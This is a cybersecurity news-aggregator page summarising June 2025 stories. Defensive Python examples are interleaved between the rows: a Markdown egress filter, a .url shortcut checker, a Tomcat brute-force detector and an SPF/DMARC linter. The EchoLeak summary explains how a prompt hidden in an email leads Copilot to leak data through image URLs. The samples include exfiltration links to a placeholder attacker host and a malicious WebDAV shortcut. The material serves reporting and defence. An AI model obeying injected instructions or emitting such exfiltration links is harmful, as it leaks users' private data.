Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 11813
Checks for new stories every ~15 minutes
| Date | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2025-06-11 18:33:20 | theregister | MALWARE | FIN6 Shifts Tactics, Targets Recruiters with Malware on Job Sites | FIN6, previously known for credit card theft and point-of-sale attacks, now engages in sophisticated phishing attacks targeting job recruiters via LinkedIn and Indeed.
The cybercriminal group uses fake job-seeker profiles to lure recruiters to malicious websites hosted on AWS, disguised as personal portfolios.
Recruiters are tricked into downloading a ZIP file containing the More_eggs malware, a JavaScript-based backdoor that facilitates remote command execution, credential theft, and further malware delivery.
More_eggs runs largely in memory as script-based stages, which frustrates file-based detection and lets it slip past conventional endpoint controls.
The domains used for the fake portfolios are registered anonymously and leverage privacy features from GoDaddy, complicating efforts to track and shut down the malicious sites.
Additional layers of deception include non-hyperlinked emails and CAPTCHA walls that screen out automated scanners, enhancing the success rate of the phishing campaign.
DomainTools has identified and published indicators of compromise to aid in the detection and analysis of this campaign, highlighting the ongoing threat from FIN6 through less conventional vectors.
Despite the article's humorous comment on recruiters, it underscores the serious nature of such targeted phishing scams and the vulnerabilities they exploit. | Details |
| 2025-06-11 18:04:08 | theregister | MISCELLANEOUS | Salesforce Identifies CVEs and Urges Customer Security Upgrades | Salesforce has assigned five new CVEs covering FlexCards and Data Mappers, components of its Industry Cloud (OmniStudio) offering, following a security evaluation.
Over 20 configuration issues were reported, exposing risks such as unauthorized access and session hijacking; however, only five were considered for CVE labeling.
Misconfigurations identified by AppOmni were not classified by Salesforce as CVEs, pushing the responsibility for security fixes onto the customers.
These vulnerabilities mainly involve default settings and poor configuration choices by users, which can lead to severe security breaches involving sensitive data access.
Salesforce advises customers to rigorously assess and secure their configurations to prevent potential exploitations by attackers.
Aaron Costello from AppOmni highlighted the necessity for organizations using Salesforce's industry clouds to enforce field-level security and apply regular updates.
The report by Costello also recommended increasing the component permission requirements and using private caching methods to enhance data protection. | Details |
| 2025-06-11 17:54:28 | bleepingcomputer | DATA BREACH | Zero-Click AI Vulnerability in Microsoft 365 Copilot Fixed | A new zero-click AI vulnerability named 'EchoLeak' enables data exfiltration from Microsoft 365 Copilot without user interaction.
The flaw, assigned CVE-2025-32711 and rated critical by Microsoft, was reported by Aim Labs researchers and has been addressed server-side.
EchoLeak belongs to a new class of weaknesses Aim Labs calls 'LLM Scope Violation', in which untrusted, low-privilege input (here, an inbound email) steers the model into reading and disclosing privileged data the user never asked it to touch.
The chain starts with an email carrying a hidden prompt; when Copilot later retrieves that email as context, the injected instructions make it embed sensitive data in the URL of a crafted link or image, and the client fetching that URL sends the data to the attacker without any click.
Microsoft fixed the issue server-side, so customers need take no action, and says it has seen no exploitation in the wild.
The incident underscores the potential risks and the need for heightened security measures around AI-integrated systems within enterprise environments.
Recommended actions include enhancing prompt injection filters, applying granular input scoping, and configuring RAG engines to block potentially malicious external communications. | Details |
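The zero-click channel in the EchoLeak description above is the renderer, not the model: a Markdown image or link whose URL carries the secret is fetched or shown before any human looks at it. The block below is an added example, not Microsoft's or Aim Labs' code, of an output-side egress filter for assistant replies. It drops images and reference definitions that point outside an allow-list of first-party hosts and reduces untrusted links to their visible text. The allow-listed hosts, the attacker host and the sample reply are assumptions constructed for the demo.

```python
"""Added example: Markdown egress filter for LLM/RAG output (not Microsoft's
or Aim Labs' code). Hosts, the allow-list and the sample reply are assumptions."""
import re
from urllib.parse import urlparse

# Inline images ![alt](url) and links [text](url); group 1 is "!" for images.
_INLINE_REF = re.compile(r'(!?)\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')
# Reference-style definitions "[label]: url", which dodge filters that only look
# for inline links; any [text][label] using a removed definition becomes inert.
_REF_DEF = re.compile(r'^[ \t]*\[([^\]]+)\]:[ \t]*(\S+).*$', re.M)

# Hypothetical allow-list of first-party hosts whose URLs may be rendered.
TRUSTED_HOSTS = {"contoso.sharepoint.com", "teams.microsoft.com"}


def is_trusted_url(url: str) -> bool:
    """Only https URLs to an allow-listed host (or a subdomain), with no userinfo."""
    p = urlparse(url)
    if p.scheme != "https" or p.username or p.password:
        return False
    host = (p.hostname or "").lower()
    return any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS)


def sanitize_markdown(text: str):
    """Return (clean_text, findings).

    Images to untrusted hosts are dropped outright, because many clients fetch
    them automatically (the zero-click exfiltration channel). Untrusted links
    keep only their visible text; untrusted reference definitions are removed.
    """
    findings = []

    def inline_repl(m):
        bang, label, url = m.group(1), m.group(2), m.group(3)
        if is_trusted_url(url):
            return m.group(0)
        findings.append(("image" if bang else "link", url))
        return "" if bang else label

    def refdef_repl(m):
        if is_trusted_url(m.group(2)):
            return m.group(0)
        findings.append(("refdef", m.group(2)))
        return ""

    clean = _INLINE_REF.sub(inline_repl, text)
    clean = _REF_DEF.sub(refdef_repl, clean)
    return clean, findings


# Constructed sample of what a poisoned assistant reply might look like.
SAMPLE_REPLY = (
    "Here is the summary you asked for.\n"
    "![status](https://evil.example/t.png?d=Q1%20revenue%3A%2012M)\n"
    "See the [plan](https://contoso.sharepoint.com/sites/fin/plan.docx).\n"
    "More [here](http://evil.example/?k=SECRET_API_KEY) and [notes][1].\n"
    "[1]: https://evil.example/?k=SECRET_API_KEY\n"
)

if __name__ == "__main__":
    cleaned, found = sanitize_markdown(SAMPLE_REPLY)
    print(cleaned)
    for kind, url in found:
        print(f"blocked {kind}: {url}")
```

Two caveats a deployer should keep in mind: an allow-listed host that offers an open redirect or a fetch-on-behalf proxy still carries data out, so the allow-list has to be reviewed with that in mind, and this filter closes only the automatic-fetch channel; the reply text itself can still quote the secret, which is what the input-side scoping and prompt-injection controls in the article's recommendations address.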
| 2025-06-11 17:47:02 | thehackernews | MALWARE | Former Black Basta Affiliates Adopt Microsoft Teams in Phishing Scams | Former associates of the Black Basta ransomware group have continued employing phishing and Python scripts in their attacks, adopting methods like Microsoft Teams phishing.
ReliaQuest identified significant activity in Teams phishing between February and May 2025, with many attacks originating from compromised onmicrosoft[.]com domains.
These threat actors are impersonating legitimate entities and tend to leverage existing remote desktop tools like Quick Assist and AnyDesk to gain deeper access, followed by deploying malicious Python scripts for command-and-control operations.
After Black Basta's internal chat logs leaked in February, the affiliates' tactics have remained largely the same, even as the original brand has faded from view.
The attackers are believed to have moved to other Ransomware-as-a-Service (RaaS) operations such as CACTUS, or to have folded into the newly identified BlackLock group and the DragonForce ransomware cartel.
New Java-based Remote Access Trojans (RATs) are being deployed by these groups, now utilizing cloud file hosting services to disguise command and control traffic and enhance capabilities like file transfer and data theft.
Rapidly evolving techniques suggest an increase in the complexity and stealth of future phishing campaigns, likely involving more sophisticated RATs and persistent access strategies. | Details |
| 2025-06-11 15:49:27 | bleepingcomputer | NATION STATE ACTIVITY | Stealth Falcon Exploits Windows Zero-Day in Espionage Scheme | An APT group, Stealth Falcon, exploited a zero-day remote code execution vulnerability in Windows WebDAV handling to target Middle Eastern governments and defense entities.
CVE-2025-33053 lets an attacker set the working directory of a legitimate Windows executable to a remote WebDAV share, so that the helper programs it launches by relative name are resolved from the attacker's server instead of the system folders.
Microsoft patched the flaw in their latest update following its discovery and detailed analysis by Check Point Research.
Attackers leveraged a .url file, disguised as a PDF in phishing emails, to manipulate the working directory of Windows tools and execute malware remotely.
The malware installed includes 'Horus Loader' and 'Horus Agent,' sophisticated tools for espionage activities such as system fingerprinting and command execution.
Check Point's investigation revealed the inclusion of additional post-exploitation tools like a credential dumper and a passive backdoor, enhancing the attackers' capabilities.
Given the sophistication and stealth of the attacks, critical entities are urged to update their systems and monitor or block WebDAV traffic to prevent similar exploits. | Details |
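The lure in the CVE-2025-33053 chain above is an ordinary Internet Shortcut (.url) file: its URL key points at a legitimate local Windows binary while WorkingDirectory points at the attacker's WebDAV share. That combination is cheap to spot in mail gateways and EDR file scans. The block below is an added triage check, not Check Point's or Microsoft's code; the .url samples are constructed, the WebDAV UNC form `\\host@80\DavWWWRoot` is Windows' standard syntax, and iediagcmd.exe is used as an illustrative target only.

```python
"""Added example: a triage check for Windows Internet Shortcut (.url) files
(not Check Point's or Microsoft's code). Sample shortcuts are constructed."""
import configparser
import re

_EXEC_EXT = (".exe", ".com", ".cmd", ".bat", ".scr", ".msi")


def is_remote_location(value: str) -> bool:
    """True for UNC paths (\\\\host\\share, including the WebDAV form
    \\\\host@80\\DavWWWRoot) and for http(s):// or file://host/ URLs;
    False for local drive paths such as C:\\... or file:///C:/..."""
    v = value.strip()
    if v.startswith("\\\\") or v.startswith("//"):
        return True
    m = re.match(r"^(https?|file)://([^/\\]*)", v, re.I)
    if not m:
        return False
    return m.group(1).lower() != "file" or m.group(2) != ""


def local_executable_target(url: str):
    """Return the local path if URL= launches a local executable, else None."""
    v = url.strip()
    m = re.match(r"^file:///([a-z]:[\\/].*)$", v, re.I)
    path = m.group(1) if m else (v if re.match(r"^[a-z]:[\\/]", v, re.I) else None)
    if path and path.lower().endswith(_EXEC_EXT):
        return path.replace("/", "\\")
    return None


def analyze_url_shortcut(text: str) -> dict:
    """Parse the INI-style .url content and report the suspicious combinations."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    sec = cp["InternetShortcut"] if cp.has_section("InternetShortcut") else {}
    url = sec.get("url", "")
    workdir = sec.get("workingdirectory", "")
    findings = []
    target = local_executable_target(url)
    # The CVE-2025-33053 pattern: local binary, remote working directory.
    if target and is_remote_location(workdir):
        findings.append(f"launches local executable {target} with remote WorkingDirectory {workdir}")
    # Windows-specific WebDAV UNC markers are rare in legitimate shortcuts.
    if re.search(r"@(80|443|ssl)(?=[\\/]|$)", workdir, re.I) or "davwwwroot" in workdir.lower():
        findings.append(f"WebDAV UNC syntax in WorkingDirectory: {workdir}")
    # A shortcut that opens a file straight off a remote share is also worth a look.
    if target is None and url.lower().startswith("file://") and is_remote_location(url):
        findings.append(f"URL opens a file from a remote share: {url}")
    return {"url": url, "working_directory": workdir,
            "findings": findings, "suspicious": bool(findings)}


# Constructed samples (not real attack artifacts).
MALICIOUS_SHORTCUT = r"""[InternetShortcut]
URL=file:///C:/Program Files/Internet Explorer/iediagcmd.exe
WorkingDirectory=\\203.0.113.10@80\DavWWWRoot\share
IconFile=C:\Windows\System32\shell32.dll
IconIndex=1
"""
BENIGN_SHORTCUT = r"""[InternetShortcut]
URL=https://www.example.com/
IconIndex=0
"""

if __name__ == "__main__":
    for name, sample in (("malicious", MALICIOUS_SHORTCUT), ("benign", BENIGN_SHORTCUT)):
        result = analyze_url_shortcut(sample)
        print(name, "suspicious" if result["suspicious"] else "clean")
        for f in result["findings"]:
            print("  -", f)
```

The check is deliberately about the combination rather than either key alone: a local executable in URL= is common in desktop shortcuts, and a remote WorkingDirectory occasionally appears in legitimate intranet shortcuts, but the two together are the whole trick. Pair it with the article's advice to block or monitor outbound WebDAV (the WebClient service) from endpoints that do not need it.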
| 2025-06-11 15:39:15 | theregister | MALWARE | Interpol's Massive Crackdown on Infostealer Malware Nets 32 Arrests | Interpol, in collaboration with Asian countries, successfully conducted Operation Secure, arresting 32 individuals linked to infostealer malware.
The operation led to the shutdown of 20,000 malicious domains and IP addresses, representing 79% of the targets identified.
Authorities seized 41 servers and over 100 GB of data, disrupting numerous cybercrime operations.
The multi-country effort involved contributions from 26 nations, focusing on tracking down servers, analyzing intelligence, and executing coordinated takedowns.
In Vietnam, police apprehended a group leader, seizing cash, SIM cards, and documents indicating plans to sell corporate accounts.
Additional raids in Sri Lanka and Nauru resulted in 14 arrests, with further investigations identifying 40 more victims of the malware.
Hong Kong Police played a significant role, analyzing over 1,700 intelligence items and identifying 117 command-and-control servers.
More than 216,000 individuals at risk from infostealer malware were notified and advised to take protective actions such as changing passwords and freezing accounts. | Details |
| 2025-06-11 15:03:50 | theregister | MISCELLANEOUS | Enhancing Security Response Through Operational Threat Intelligence | Prelude Security emphasizes the importance of quickly operationalizing threat intelligence to counteract ransomware and other cybersecurity threats effectively.
Traditional methods of mapping threats to defensive measures are manual, slow, and can leave organizations vulnerable during critical periods.
Effective use of threat intelligence requires rapid integration into security processes to preemptively address potential vulnerabilities and attack techniques.
Many organizations fail to efficiently utilize high-quality intelligence due to lacking streamlined processes and tools for timely implementation.
Mapping security configurations to frameworks like MITRE ATT&CK helps identify coverage gaps and optimize settings against known threats.
Automation of threat mapping and security tool configuration can significantly reduce response times and enhance overall security efficacy.
Prelude advocates for a proactive security posture, enabling continuous validation and optimization of defenses in real time to stay ahead of emerging threats.
Joe Kaden at Prelude focuses on helping organizations streamline and operationalize their security practices to maximize the potential of their existing tools. | Details |
| 2025-06-11 14:29:29 | bleepingcomputer | CYBERCRIME | Coordinated Brute-Force Attacks Target Apache Tomcat Interfaces | A recent cybersecurity alert detailed coordinated brute-force attacks on Apache Tomcat Manager interfaces, primarily used by large enterprises and SaaS providers.
The attack utilized hundreds of unique IP addresses, many previously identified as malicious, to attempt unauthorized access by testing numerous credentials.
GreyNoise cybersecurity analysts observed the malicious activity initiating from two separate campaigns starting June 5th, involving around 400 unique IPs focusing on Tomcat services.
Most of these IP addresses originated from servers hosted by DigitalOcean, suggesting the misuse of legitimate cloud infrastructure for malicious purposes.
Organizations with exposed Tomcat Manager interfaces are advised to strengthen authentication measures, monitor security logs, and block suspicious IPs to mitigate breach risks.
While these attacks did not exploit specific vulnerabilities, Apache had previously patched several critical RCE vulnerabilities in Tomcat, highlighting ongoing security challenges.
The attacks demonstrate a consistent interest from threat actors in exploiting web-based interfaces and underline the importance of robust cybersecurity defenses and prompt patch management. | Details |
| 2025-06-11 14:01:14 | bleepingcomputer | MALWARE | Global Crackdown on Infostealer Malware Leads to Multiple Arrests | International law enforcement action "Operation Secure" targeted global infostealer malware operations across 26 countries, resulting in 32 arrests.
The action focused on dismantling criminal groups stealing financial and personal data, with significant data seizures and server takedowns.
Vietnamese police arrested 18 individuals, including a leader of a cybercrime group involved in selling corporate accounts.
Authorities identified 117 servers in Hong Kong used for phishing, online fraud, and social media scams.
Private cybersecurity firms such as Kaspersky, Group-IB, and Trend Micro provided critical support and intelligence.
Previous disruptions include a significant takedown involving the U.S. Department of Justice, the FBI, and Microsoft, which seized over 2,300 domains associated with Lumma Stealer.
The same malware operations have been linked to major data breaches at companies like UnitedHealth, PowerSchool, and Snowflake. | Details |
| 2025-06-11 13:51:33 | thehackernews | CYBERCRIME | Coordinated Brute-Force Attacks Target Apache Tomcat Managers | GreyNoise reports a significant rise in brute-force attacks against Apache Tomcat Manager interfaces, identifying 295 malicious IPs involved.
The attacks, observed on June 5, 2025, were predominantly from IPs based in the US, UK, Germany, the Netherlands, and Singapore, aiming to access exposed Tomcat services at scale.
The trend reflects a coordinated attempt to exploit Tomcat Manager instances, with no specific vulnerability tied directly to these attempts, indicating a broader opportunistic threat.
Alongside, Bitsight discovered over 40,000 security cameras publicly accessible via HTTP or RTSP, primarily in the telecom sector, showing a large-scale privacy breach risk.
These wide-reaching security exposures suggest a need for increased cybersecurity vigilance, including strong authentication measures, access restrictions, and ongoing monitoring for suspicious activity.
Both incidents highlight a persistent global challenge in securing both web interfaces and IoT devices against unauthorized access and exploitation. | Details |
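Both Tomcat items above (the bleepingcomputer and thehackernews rows) describe the same thing from the defender's side: hundreds of source IPs each making a handful of login attempts against the Manager app, which per-IP lockout thresholds never trip. The block below is an added example, not GreyNoise's code, of a detector over Tomcat access-log lines in the default `common` pattern that reports both per-source failure counts and the peak number of distinct sources inside a time window, which is the signal that separates a distributed campaign from one noisy host. The log lines are constructed.

```python
"""Added example: detector for distributed credential guessing against the
Tomcat Manager app, over access-log lines in Tomcat's default 'common'
pattern (not GreyNoise's code). The log lines below are constructed."""
import re
from collections import Counter
from datetime import datetime, timedelta

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
_ACCESS = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def parse_access_line(line: str):
    """Return a dict for a well-formed line, None otherwise."""
    m = _ACCESS.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"], "user": m["user"], "path": m["path"],
        "status": int(m["status"]),
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
    }


def detect_manager_bruteforce(lines, window=timedelta(minutes=10),
                              min_distinct_ips=5, min_failures_per_ip=3):
    """Summarise failed Manager requests (401 = bad credentials, 403 = denied,
    e.g. by RemoteAddrValve): per-source counts, the sources over the per-IP
    threshold, and the peak number of distinct sources seen in any `window`."""
    events = sorted(
        (e for e in map(parse_access_line, lines)
         if e and e["path"].startswith("/manager") and e["status"] in (401, 403)),
        key=lambda e: e["ts"],
    )
    per_ip = Counter(e["ip"] for e in events)
    peak, j = 0, 0
    for i, e in enumerate(events):          # sliding window over sorted failures
        while events[j]["ts"] < e["ts"] - window:
            j += 1
        peak = max(peak, len({x["ip"] for x in events[j:i + 1]}))
    return {
        "failed_attempts": len(events),
        "per_ip": dict(per_ip),
        "noisy_ips": sorted(ip for ip, n in per_ip.items() if n >= min_failures_per_ip),
        "peak_distinct_ips": peak,
        "distributed": peak >= min_distinct_ips,
    }


# Constructed access-log excerpt: six sources probing /manager within two minutes,
# one legitimate admin login and one unrelated 404.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Jun/2025:14:02:11 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.11 - - [05/Jun/2025:14:02:13 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.12 - - [05/Jun/2025:14:02:20 +0000] "GET /manager/html HTTP/1.1" 401 2473
198.51.100.7 - - [05/Jun/2025:14:02:25 +0000] "GET /manager/html HTTP/1.1" 401 2473
198.51.100.8 - - [05/Jun/2025:14:02:31 +0000] "GET /manager/text/list HTTP/1.1" 401 2473
10.0.0.5 - admin [05/Jun/2025:14:02:40 +0000] "GET /manager/html HTTP/1.1" 200 19876
203.0.113.10 - - [05/Jun/2025:14:03:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.10 - - [05/Jun/2025:14:03:09 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.0.2.44 - - [05/Jun/2025:14:03:15 +0000] "GET /index.html HTTP/1.1" 404 -
198.51.100.9 - - [05/Jun/2025:14:04:05 +0000] "POST /manager/html/upload HTTP/1.1" 401 2473
"""

if __name__ == "__main__":
    report = detect_manager_bruteforce(SAMPLE_LOG.splitlines())
    print(f"{report['failed_attempts']} failed Manager requests from "
          f"{len(report['per_ip'])} sources; peak {report['peak_distinct_ips']} "
          f"distinct in window; distributed={report['distributed']}")
    print("noisy:", report["noisy_ips"])
```

In the sample only one source crosses the per-IP threshold, while the distinct-source count tells the real story. The thresholds are starting points; on a server where nobody should reach the Manager app from the internet, a single 401 from a non-allow-listed address is already worth an alert, and the durable fix is to bind the Manager app to a RemoteAddrValve allow-list or remove it entirely, as the articles recommend.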
| 2025-06-11 11:35:54 | thehackernews | MALWARE | INTERPOL Shuts Down 20,000 Malicious IPs in Global Operation | INTERPOL’s Operation Secure dismantled over 20,000 malicious IP addresses tied to 69 malware variants between January and April 2025.
Law enforcement from 26 countries collaborated to locate servers, map network infrastructures, and perform decisive takedowns.
The coordinated international effort led to the successful takedown of 79% of targeted suspicious IPs and the seizure of 41 servers and over 100 GB of compromised data.
Authorities arrested 32 suspects involved in diverse illegal cyber activities, including arrests in Vietnam, Sri Lanka, and Nauru.
Hong Kong Police discovered 117 command-and-control servers used for initiating phishing scams, online fraud, and social media deception.
Private sector collaboration, including from Group-IB, played a crucial role by providing essential intelligence on compromised user accounts and sensitive data.
Compromised information typically facilitated secondary cybercrimes such as financial fraud, ransomware, and business email compromise (BEC) attacks.
Operation Secure illustrates the increasing effectiveness of global cooperative efforts in combating sophisticated cybercrime networks. | Details |
| 2025-06-11 11:27:07 | thehackernews | CYBERCRIME | DNS Security: Critical Control in Cyber Defense Strategy | DNS, foundational to internet functionality, translates domain names to IP addresses, facilitating user online interactions.
Traditionally unsecured, DNS is susceptible to attacks, exposing users to service outages, data breaches, and redirections to malicious sites.
Securing DNS isn't optional; it's a primary line of defense against various cyber threats, playing a role in early threat detection and response.
ClouDNS enhances DNS security with DDoS protection, DNSSEC to authenticate responses, and DNS over HTTPS/TLS to prevent interception.
Secure DNS practices such as query encryption and proper management of SPF, DKIM, and DMARC records are crucial for protecting data and maintaining domain reputation.
DNS security offers a broad security perspective by acting as an early detection system, identifying potential intrusions and malicious activities at the initial stages.
The article underscores the importance of DNS in digital infrastructure security, advocating for robust preventative measures to ensure operational continuity and data integrity. | Details |
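The SPF and DMARC records mentioned above are plain TXT strings, and most of the damage in practice comes from a handful of weak settings (`+all`, `p=none`, missing reports, too many lookups) that are easy to lint before publishing. The block below is an added example, not ClouDNS's code, of static checks for both record types following RFC 7208 (SPF) and RFC 7489 (DMARC); the records it evaluates are constructed.

```python
"""Added example: static checks for SPF and DMARC TXT records (not ClouDNS's
code). The records below are constructed; rules follow RFC 7208 and RFC 7489."""
import re

# SPF terms that cost a DNS lookup (RFC 7208 s4.6.4 caps them at 10).
_SPF_LOOKUP = re.compile(r"^[+\-~?]?(include:|a(?::|/|$)|mx(?::|/|$)|ptr|exists:|redirect=)", re.I)


def evaluate_spf(record: str) -> list:
    """Return a list of weaknesses; an empty list means no finding."""
    findings = []
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["not an SPF record (missing v=spf1)"]
    mechs = terms[1:]
    all_terms = [t for t in mechs if t.lower().lstrip("+-~?") == "all"]
    if not all_terms:
        findings.append("no 'all' mechanism: unlisted senders get a neutral result")
    else:
        q = all_terms[-1][0] if all_terms[-1][0] in "+-~?" else "+"  # default qualifier is +
        if q == "+":
            findings.append("'+all' authorizes every sender, SPF is effectively disabled")
        elif q == "?":
            findings.append("'?all' is neutral and gives receivers nothing to act on")
        if mechs[-1].lower().lstrip("+-~?") != "all":
            findings.append("'all' is not the last term; terms after it are never evaluated")
    if any(t.lower().lstrip("+-~?").startswith("ptr") for t in mechs):
        findings.append("'ptr' mechanism is deprecated (RFC 7208 s5.5) and slow")
    lookups = sum(1 for t in mechs if _SPF_LOOKUP.match(t))
    if lookups > 10:
        findings.append(f"{lookups} DNS-lookup terms exceed the limit of 10 (permerror)")
    return findings


def parse_dmarc(record: str) -> dict:
    """Split 'k=v; k=v' into a dict with lower-cased tag names."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    return tags


def evaluate_dmarc(record: str) -> list:
    """Return a list of weaknesses; an empty list means no finding."""
    tags = parse_dmarc(record)
    if tags.get("v", "").upper() != "DMARC1":
        return ["not a DMARC record (missing v=DMARC1)"]
    findings = []
    p = tags.get("p")
    if p is None:
        findings.append("missing required p= tag; receivers will ignore the record")
    elif p.lower() == "none":
        findings.append("p=none only monitors; spoofed mail is still delivered")
    pct = tags.get("pct", "100")
    if pct.isdigit() and int(pct) < 100:
        findings.append(f"pct={pct}: policy applies to only {pct}% of failing mail")
    if "rua" not in tags:
        findings.append("no rua= address: no aggregate reports, so failures stay invisible")
    sp = tags.get("sp")
    if sp and sp.lower() == "none" and (p or "").lower() != "none":
        findings.append("sp=none leaves subdomains unprotected while the org domain is enforced")
    return findings


if __name__ == "__main__":
    # Constructed records: one weak and one reasonable of each kind.
    for rec in ("v=spf1 include:_spf.example.net +all",
                "v=spf1 ip4:192.0.2.0/24 include:_spf.example.net -all",
                "v=DMARC1; p=none; rua=mailto:dmarc@example.com",
                "v=DMARC1; p=reject; sp=reject; rua=mailto:dmarc@example.com"):
        checker = evaluate_dmarc if rec.upper().startswith("V=DMARC1") else evaluate_spf
        print(rec, "->", checker(rec) or ["ok"])
```

These are syntax-level checks only; they do not resolve the `include:` targets, so the lookup count is a lower bound, and they say nothing about whether DKIM is actually signing. They are meant to run in CI against the zone file before a change is pushed, where a `+all` or `p=none` slipping in is still cheap to catch.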
| 2025-06-11 10:32:07 | thehackernews | CYBERCRIME | SinoTrack GPS Flaws Enable Unauthorized Vehicle Control and Tracking | Two key security vulnerabilities in SinoTrack GPS devices could lead to unauthorized tracking and control of vehicles.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an advisory noting that attackers could exploit these flaws via a common web management interface.
Attackers can access vehicle functions like location tracking and fuel pump disconnection by using default passwords.
All versions of the SinoTrack IoT PC Platform are affected by these security vulnerabilities.
Exploitation needs only the device identifier, which is printed on the receiver and can be read with physical access or harvested from photos of units posted online, combined with the unchanged default password.
The security researcher, Raúl Ignacio Cruz Jiménez, emphasized the risks of remote execution and personal information theft due to the device’s inadequate security measures.
No current fixes or patches are available for these vulnerabilities; SinoTrack has not yet responded to the issues.
CISA advises changing the default passwords immediately and concealing device identifiers to mitigate risks until a fix is deployed. | Details |
| 2025-06-11 10:15:24 | theregister | MISCELLANEOUS | Microsoft Delays Windows 11 Update Due to Compatibility Issues | Microsoft announced and then quickly modified a Patch Tuesday update for Windows 11 24H2 due to a compatibility issue affecting some devices.
Affected devices were set to receive a revised update with the June 2025 security improvements shortly after the initial release.
The incident raised concerns regarding the speed of addressing and acknowledging compatibility issues in major OS updates.
The specific nature of the compatibility issue was not disclosed, but social media speculation suggested it might relate to CPU architecture differences.
Although Microsoft intended the update to include critical security fixes, the flaw required a unique, expedited correction.
Microsoft's rapid response to fix the issue was noted, though it brought up quality control questions about how such a significant error was missed.
The company did not specify whether "by the end of the day" referred to Redmond local time or UTC. | Details |
| 2025-06-11 10:07:31 | thehackernews | MISCELLANEOUS | Efficient Security Strategies for Small Teams at River Island | River Island demonstrates effective security with a lean team of three, managing over 200 stores and an e-commerce platform without increasing headcount.
Adopted Intruder’s exposure management platform to automate the visibility of their external attack surfaces, enhancing their security posture with continuous monitoring.
Reduced tool redundancy by selecting integral and highly effective security tools, maximizing utility and minimizing operational inefficiency.
Automated detection of emerging threats like Log4j, providing rapid responses and alleviating the need for manual scans, thus maintaining security with minimal resources.
Enabled faster issue resolution by integrating their security systems with Jira, allowing direct task assignment to asset owners rather than centralizing through the security team.
Implemented automated dashboards for cybersecurity reporting, reducing manual work and providing clear, real-time insights to leadership.
The streamlined and automated systems not only saved time but also built trust with leadership, showing an effective balance between cybersecurity and resource management.
Sunil Patel, River Island’s InfoSec Officer, illustrates that a small yet strategic security team can efficiently manage vast infrastructures and face modern cyber threats. | Details |